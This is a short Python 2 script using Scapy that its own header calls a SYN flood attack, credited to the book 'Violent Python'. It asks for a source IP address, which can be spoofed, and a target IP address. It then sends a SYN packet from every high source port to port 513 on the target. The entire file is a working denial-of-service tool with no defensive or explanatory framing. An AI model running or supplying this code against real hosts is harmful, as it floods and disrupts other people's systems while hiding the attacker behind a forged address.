#!/usr/bin/env python2
# written by Moses Arocha
# Created in Python, it is a SYN Flood Attack that uses the library Scapy, created wit the help of TJ O'Connor "Violent Python"

from scapy.all import *

def synFlood(src, tgt):
	for sport in range(1024, 65535):
		IPlayer = IP(src=src, dst=tgt)
		TCPlayer = TCP(sport=sport, dport=513)
		pkt = IPlayer / TCPlayer
		send(pkt)

src = raw_input("\n\n\t What is the Source IP Address : ")
tgt = raw_input("\n\n\t What is the Destination IP Address : ")

synFlood(src, tgt)
